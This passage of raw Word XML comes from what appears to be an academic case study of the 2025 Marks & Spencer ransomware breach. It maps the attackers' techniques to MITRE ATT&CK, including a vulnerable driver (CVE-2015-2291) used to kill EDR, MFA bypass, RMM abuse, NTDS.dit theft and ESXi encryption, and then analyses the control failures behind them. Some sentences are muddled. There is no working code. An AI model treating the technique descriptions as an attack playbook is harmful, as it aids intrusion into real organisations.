            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05022CDC"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F7F9E42"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Third-party helpdesk provider (TCS) was the initial breach vector into M&amp;S core infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE71582"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[1][6]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="060DE872" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D26F7DA" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFF5FF4"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T1562.001 Disable Defences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1210F3ED"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roofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Defence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6A8E3C"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IOCTL driver CVE-2015-2291 used to terminate EDR agents; ESXi hypervisor layer bypasses guest security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25DF640C"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[4][9]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3B0C4C62" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E9B06D9" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C629DD4"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T1650 MFA Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E4DB68A"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3660B4F5" w14:textId="69A2D621" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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Apple-registered Scattered Spider techniques MFA fatigue (push spam) and SIM-swapping are reported Scattered Spider techniques MFA resets being social-engineered were confirmed by NCSC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="370AF957"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[7][4]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="5B117282" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61DB13E8" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C978FFD"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T1021.001 RMM Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7B952E"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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1916EF5D" w14:textId="4CC7A139" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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roofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>AnyDesk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>ScreenConnect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> are legitimate RMM tools that are used after compromising to mix into normal traffic of an administrator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE97A9C"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[7][23]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="61A2BB71" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4762DC23" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A40EAC"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T1657 Double Extortion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED39BCC"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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270CCD9B" w14:textId="05FE2305" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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Demand of ransom was issued to the M&amp;S CEO through hacked email; threat of publishing data in the case of non-payment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31388DC0" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>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[2][16]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DAB0649" w14:textId="1C4A0706" w:rsidR="0097244F" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2: </w:t>
      </w:r>
      <w:r w:rsidR="000D0F11" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Mapping of MITRE ATT&amp;CK TTP Scattered Spider / DragonForce Campaign, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D41A80" w14:textId="78095911" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AAE6B3" wp14:editId="4CE23B9D">
            <wp:extent cx="5378669" cy="3169119"/>
            <wp:effectExtent l="76200" t="76200" r="127000" b="127000"/>
            <wp:docPr id="1424341358" name="Picture 1424341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9"/>
                    <a:srcRect t="11486"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5431267" cy="320011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061CA67F" w14:textId="299A7C38" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig </w:t>
      </w:r>
      <w:r w:rsidR="006B16F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000D0F11" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK TTP Distribution by Tactic MITRE (12 TTPs). </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Sources: [4][5][7][8][9][22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B07F9E" w14:textId="1CB9D19B" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A mapping demonstrates an attack chain that is mainly resistant to </w:t>
      </w:r>
      <w:r w:rsidR="00B33629" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>perimeter-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Some ten out of the twelve TTPs are based on the identity and access management (IAM) layer instead of technical vulnerabilities, which is agreeable to the fact that Mandiant notes that initial access is not established through the use of malware and thus the activity remains beyond reach of the endpoint detection and response services [8]. The strategic execution of the VMware thing targeting VMware ESXi in order to </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Dragonforce ransomware (T1486) [9][2] is a calculated attack meant to cause maximum impact to the operations without carrying out the security tools used by the guest-OS. The 2024 Threat Landscape is one of the publications of ENISA that specifically mentions hypervisor-targeting as a new ransomware propagation method [14].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEFA6E" w14:textId="341C223A" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The shift towards Adversary-in-the-Middle (AiTM)- based phishing models, including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Evilginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1557) as reported by Push Security [22] indicates a shift towards capabilities development beyond the MFA fatigue method used in the 2023 MGM and Caesars attacks by Scattered Spider [4][20]. This will require a defensive response of transitioning TOTP-based MFA to hardware bound FIDO2 / passkey authentication - the highest priority remediation in this analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3659DFAA" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6595F" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.  Root Cause and Security Control Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255AD72" w14:textId="4D143776" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.1 Technical Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40847227" w14:textId="57991AC2" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The successful exfiltration of the NTDS.dit file containing the Active Directory database [15][19] was the most technically important failure. All domain accounts' NTLM password hashes are stored in this repository, which can be lost offline or used in Pass-the-Hash attacks to fully seize control of the domain. The breach demonstrates the shortcomings of three security controls in the following areas: the absence of a privileged access workstation framework that could aid in preventing direct access to the domain controller; insufficiently restricted access permission to domain controller file paths; and no monitoring of anomalous Active Directory replication events [8][12].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35514BB1" w14:textId="35E6B406" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The injection of DragonForce ransomware [9][2] against the VMware ESXi revealed the lack of security monitoring at the hypervisor-level. The enterprise Endpoint Detection and Response (EDR) products typically operate as guest operating-system agents but there is the risk that those that directly steal the ESXi host can encrypt the virtual machine discs and get around the instrumentation of the guest-OS [9][14].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0ABC31" w14:textId="367A178E" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.2 Organisational</w:t>
      </w:r>
      <w:r w:rsidR="00CD1657" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shortcomings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7F22E" w14:textId="26E9C586" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The established first attack justification was the social engineering of a third-party IT helpdesk to reset privileged credentials [1], and consequently, a basic procedural malfunction. According to researchers, the opponents took advantage of a cognitive asymmetry that existed in </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> when large helpdesk is involved: the employees are motivated to solve a ticket within the shortest time possible, and they lack effective measures to verify the identity of the callers except through easily accessible external information [7][23]. The seminal work about security engineering by Anderson presupposes that identity proving is the least robust component in the authentication chains [12]; the presented situation therefore is an empirical validation of the given statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAD44E" w14:textId="1DBE9ED5" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Malfunctions of network segmentation also seem to have had a conclusive role in it. The ability of the adversaries to move their positions horizontally by leaving the third-party supplier environment to the proprietary domain-controller infrastructure of M&amp;S is the lack of segmentation between the supply-chain partners and the critical internal resources of the organisation [6][7]. This event is a direct instance of the violation of the zero-trust architecture principles as they were formulated by Srikrishna, and Potlapally [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C094E0" w14:textId="77652EA0" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00534FB1" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.3 Human</w:t>
      </w:r>
      <w:r w:rsidR="00CD1657" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
